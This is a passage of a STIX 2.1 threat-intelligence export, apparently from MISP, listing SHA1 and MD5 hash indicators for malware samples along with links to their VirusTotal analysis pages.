"id": "url--58db7fdb-c6fc-41a5-b9fb-411502de0b81",
|
|
"value": "https://www.virustotal.com/file/bb05a0d905b915e2e84a8e69c2af438f72730131c5a1e3e1fe85df13c61182ac/analysis/1476076668/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fdc-a138-4fdf-9263-4a7302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:24.000Z",
|
|
"modified": "2017-03-29T09:35:24.000Z",
|
|
"description": "sample - Xchecked via VT: 18db52a63720187b2afd57667e9ebdcb0a50a8e99909340281dcd07e266d761f",
|
|
"pattern": "[file:hashes.SHA1 = '3cbdfc6aedc18a136f1367f000999b34c443aed7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fdd-3e0c-404f-b4a8-4add02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:25.000Z",
|
|
"modified": "2017-03-29T09:35:25.000Z",
|
|
"description": "sample - Xchecked via VT: 18db52a63720187b2afd57667e9ebdcb0a50a8e99909340281dcd07e266d761f",
|
|
"pattern": "[file:hashes.MD5 = '45cf0c73492e28d5d2575589a3f90968']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fde-3f54-4da3-9519-4af102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:26.000Z",
|
|
"modified": "2017-03-29T09:35:26.000Z",
|
|
"first_observed": "2017-03-29T09:35:26Z",
|
|
"last_observed": "2017-03-29T09:35:26Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fde-3f54-4da3-9519-4af102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fde-3f54-4da3-9519-4af102de0b81",
|
|
"value": "https://www.virustotal.com/file/18db52a63720187b2afd57667e9ebdcb0a50a8e99909340281dcd07e266d761f/analysis/1445659352/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fdf-bd00-43b9-b8f3-419d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:27.000Z",
|
|
"modified": "2017-03-29T09:35:27.000Z",
|
|
"description": "sample - Xchecked via VT: 89d4d851e6729a854fccb4d4f9277f9f545396714ff2b108d29c7ff418a501a3",
|
|
"pattern": "[file:hashes.SHA1 = '86f096adb880262b095d1eebf894f8fcf0e85c6b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fe0-bcb0-4d98-8de9-4da402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:28.000Z",
|
|
"modified": "2017-03-29T09:35:28.000Z",
|
|
"description": "sample - Xchecked via VT: 89d4d851e6729a854fccb4d4f9277f9f545396714ff2b108d29c7ff418a501a3",
|
|
"pattern": "[file:hashes.MD5 = 'a70e2993575840f07d998dfaf7ce0a15']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fe0-d6b0-4f2a-8c0f-492e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:28.000Z",
|
|
"modified": "2017-03-29T09:35:28.000Z",
|
|
"first_observed": "2017-03-29T09:35:28Z",
|
|
"last_observed": "2017-03-29T09:35:28Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fe0-d6b0-4f2a-8c0f-492e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fe0-d6b0-4f2a-8c0f-492e02de0b81",
|
|
"value": "https://www.virustotal.com/file/89d4d851e6729a854fccb4d4f9277f9f545396714ff2b108d29c7ff418a501a3/analysis/1435712437/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fe1-1fb0-46a4-a5fe-4c2a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:29.000Z",
|
|
"modified": "2017-03-29T09:35:29.000Z",
|
|
"description": "sample - Xchecked via VT: 376943f886b264824f6063e7dfc54a1a2d5071a3d44dec05208596079d6cf276",
|
|
"pattern": "[file:hashes.SHA1 = '2a0f8740018599d4a19bd72a9893cca0caf9ccf2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fe2-41b4-4c95-be70-4d2702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:30.000Z",
|
|
"modified": "2017-03-29T09:35:30.000Z",
|
|
"description": "sample - Xchecked via VT: 376943f886b264824f6063e7dfc54a1a2d5071a3d44dec05208596079d6cf276",
|
|
"pattern": "[file:hashes.MD5 = '370217cba44b99bae4a4ab42736732a8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fe3-99cc-406d-b61f-451c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:31.000Z",
|
|
"modified": "2017-03-29T09:35:31.000Z",
|
|
"first_observed": "2017-03-29T09:35:31Z",
|
|
"last_observed": "2017-03-29T09:35:31Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fe3-99cc-406d-b61f-451c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fe3-99cc-406d-b61f-451c02de0b81",
|
|
"value": "https://www.virustotal.com/file/376943f886b264824f6063e7dfc54a1a2d5071a3d44dec05208596079d6cf276/analysis/1442837082/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fe4-d3b0-4bbc-92b2-4a2c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:32.000Z",
|
|
"modified": "2017-03-29T09:35:32.000Z",
|
|
"description": "sample - Xchecked via VT: 60ff74d053037b5ae70eeaf199a0acba35f58d275d12915ae8ed813dbf9a5b55",
|
|
"pattern": "[file:hashes.SHA1 = '61afa7a7391582f1281c56392b40e60a0818ac48']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fe5-84cc-4e3e-b3c8-4c5d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:33.000Z",
|
|
"modified": "2017-03-29T09:35:33.000Z",
|
|
"description": "sample - Xchecked via VT: 60ff74d053037b5ae70eeaf199a0acba35f58d275d12915ae8ed813dbf9a5b55",
|
|
"pattern": "[file:hashes.MD5 = '716cd9cbe9a1a83610eac9243eb08d2d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fe6-c2c0-47e4-b315-4b7e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:34.000Z",
|
|
"modified": "2017-03-29T09:35:34.000Z",
|
|
"first_observed": "2017-03-29T09:35:34Z",
|
|
"last_observed": "2017-03-29T09:35:34Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fe6-c2c0-47e4-b315-4b7e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fe6-c2c0-47e4-b315-4b7e02de0b81",
|
|
"value": "https://www.virustotal.com/file/60ff74d053037b5ae70eeaf199a0acba35f58d275d12915ae8ed813dbf9a5b55/analysis/1436241338/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fe7-c02c-4b84-93c1-411002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:35.000Z",
|
|
"modified": "2017-03-29T09:35:35.000Z",
|
|
"description": "sample - Xchecked via VT: 610d37dfb3089b516e4bced89de0c5161614d50ca511853f7be81138dfc4e844",
|
|
"pattern": "[file:hashes.SHA1 = '12c9ff8d7bb0adf4fe91e84452edf69889ec8504']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fe7-fcd4-4e01-b7f4-4bfe02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:35.000Z",
|
|
"modified": "2017-03-29T09:35:35.000Z",
|
|
"description": "sample - Xchecked via VT: 610d37dfb3089b516e4bced89de0c5161614d50ca511853f7be81138dfc4e844",
|
|
"pattern": "[file:hashes.MD5 = '1e1fe720dd8422af57f99a52d34fe1e1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fe8-15c8-4e38-ba97-43d502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:36.000Z",
|
|
"modified": "2017-03-29T09:35:36.000Z",
|
|
"first_observed": "2017-03-29T09:35:36Z",
|
|
"last_observed": "2017-03-29T09:35:36Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fe8-15c8-4e38-ba97-43d502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fe8-15c8-4e38-ba97-43d502de0b81",
|
|
"value": "https://www.virustotal.com/file/610d37dfb3089b516e4bced89de0c5161614d50ca511853f7be81138dfc4e844/analysis/1435918273/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fe9-22d8-48fe-9b5c-4c4b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:37.000Z",
|
|
"modified": "2017-03-29T09:35:37.000Z",
|
|
"description": "sample - Xchecked via VT: 77e1dfaeb73c4edf762f9503c428c1d92af6882b48305f5f5b070ec136575e43",
|
|
"pattern": "[file:hashes.SHA1 = '79a4f7d94e516500ca1321bdc5232622070370cb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fea-7de4-4b23-ae93-43ec02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:38.000Z",
|
|
"modified": "2017-03-29T09:35:38.000Z",
|
|
"description": "sample - Xchecked via VT: 77e1dfaeb73c4edf762f9503c428c1d92af6882b48305f5f5b070ec136575e43",
|
|
"pattern": "[file:hashes.MD5 = '2f7665e8df44bf27ddc457715a780a41']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7feb-a5b0-4ac1-8bcd-4e8a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:39.000Z",
|
|
"modified": "2017-03-29T09:35:39.000Z",
|
|
"first_observed": "2017-03-29T09:35:39Z",
|
|
"last_observed": "2017-03-29T09:35:39Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7feb-a5b0-4ac1-8bcd-4e8a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7feb-a5b0-4ac1-8bcd-4e8a02de0b81",
|
|
"value": "https://www.virustotal.com/file/77e1dfaeb73c4edf762f9503c428c1d92af6882b48305f5f5b070ec136575e43/analysis/1476063688/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fec-e51c-4d7f-8c54-4e5202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:40.000Z",
|
|
"modified": "2017-03-29T09:35:40.000Z",
|
|
"description": "sample - Xchecked via VT: 2ec204d0f35404c2548ac3dbc7b02e5db7ba28d4bc5c701986f0bfcee2a5fa5a",
|
|
"pattern": "[file:hashes.SHA1 = 'd8af57053002c5326151f1901b34852563576401']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fed-2a2c-4592-8f3e-42c002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:41.000Z",
|
|
"modified": "2017-03-29T09:35:41.000Z",
|
|
"description": "sample - Xchecked via VT: 2ec204d0f35404c2548ac3dbc7b02e5db7ba28d4bc5c701986f0bfcee2a5fa5a",
|
|
"pattern": "[file:hashes.MD5 = 'db26befcbb4568019fe470f88e7530ce']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fee-ca00-4886-aed1-4ba802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:41.000Z",
|
|
"modified": "2017-03-29T09:35:41.000Z",
|
|
"first_observed": "2017-03-29T09:35:41Z",
|
|
"last_observed": "2017-03-29T09:35:41Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fee-ca00-4886-aed1-4ba802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fee-ca00-4886-aed1-4ba802de0b81",
|
|
"value": "https://www.virustotal.com/file/2ec204d0f35404c2548ac3dbc7b02e5db7ba28d4bc5c701986f0bfcee2a5fa5a/analysis/1457979296/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fee-3464-40e5-bc4e-405902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:42.000Z",
|
|
"modified": "2017-03-29T09:35:42.000Z",
|
|
"description": "sample - Xchecked via VT: b87ada7c17cdb5b7c3cf1e6a0d35515c62112126f2f983c1190a6d9d1060b7db",
|
|
"pattern": "[file:hashes.SHA1 = 'c1278b604b003e9c5620ebe5658941efa99bd26a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fef-6c98-496c-903f-441502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:43.000Z",
|
|
"modified": "2017-03-29T09:35:43.000Z",
|
|
"description": "sample - Xchecked via VT: b87ada7c17cdb5b7c3cf1e6a0d35515c62112126f2f983c1190a6d9d1060b7db",
|
|
"pattern": "[file:hashes.MD5 = 'a9da857b59cfdd18ba1029dd53602fee']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7ff0-0228-4e47-847d-456702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:44.000Z",
|
|
"modified": "2017-03-29T09:35:44.000Z",
|
|
"first_observed": "2017-03-29T09:35:44Z",
|
|
"last_observed": "2017-03-29T09:35:44Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7ff0-0228-4e47-847d-456702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7ff0-0228-4e47-847d-456702de0b81",
|
|
"value": "https://www.virustotal.com/file/b87ada7c17cdb5b7c3cf1e6a0d35515c62112126f2f983c1190a6d9d1060b7db/analysis/1477329388/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ff1-f7bc-4819-9041-435c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:45.000Z",
|
|
"modified": "2017-03-29T09:35:45.000Z",
|
|
"description": "sample - Xchecked via VT: ad08a0e1dace8d5a443a4bd21ec8d935e267f364ae1b152edaccb0b1f82870d7",
|
|
"pattern": "[file:hashes.SHA1 = 'adebdd6386d44e281cfd080551c2e00b65e3c121']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ff2-4240-49c3-ac94-4da402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:46.000Z",
|
|
"modified": "2017-03-29T09:35:46.000Z",
|
|
"description": "sample - Xchecked via VT: ad08a0e1dace8d5a443a4bd21ec8d935e267f364ae1b152edaccb0b1f82870d7",
|
|
"pattern": "[file:hashes.MD5 = '2557a747cb8f4ccb34b0419c1f34999a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7ff3-92e4-469a-98ee-4e7a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:47.000Z",
|
|
"modified": "2017-03-29T09:35:47.000Z",
|
|
"first_observed": "2017-03-29T09:35:47Z",
|
|
"last_observed": "2017-03-29T09:35:47Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7ff3-92e4-469a-98ee-4e7a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7ff3-92e4-469a-98ee-4e7a02de0b81",
|
|
"value": "https://www.virustotal.com/file/ad08a0e1dace8d5a443a4bd21ec8d935e267f364ae1b152edaccb0b1f82870d7/analysis/1451112966/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ff4-dd98-4dc0-835e-465602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:48.000Z",
|
|
"modified": "2017-03-29T09:35:48.000Z",
|
|
"description": "sample - Xchecked via VT: e6624eb4520d41516f64aa64a00ee224c8bf257403a12a9665d552348dad1bd5",
|
|
"pattern": "[file:hashes.SHA1 = '7874af1c02cb14114d40ee6864bfe2e0d595140e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ff5-9b74-4211-b884-4c6b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:49.000Z",
|
|
"modified": "2017-03-29T09:35:49.000Z",
|
|
"description": "sample - Xchecked via VT: e6624eb4520d41516f64aa64a00ee224c8bf257403a12a9665d552348dad1bd5",
|
|
"pattern": "[file:hashes.MD5 = '3c6f7c667c0cf1538773c05514614202']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7ff5-eaac-4d8e-bb3e-4b5b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:49.000Z",
|
|
"modified": "2017-03-29T09:35:49.000Z",
|
|
"first_observed": "2017-03-29T09:35:49Z",
|
|
"last_observed": "2017-03-29T09:35:49Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
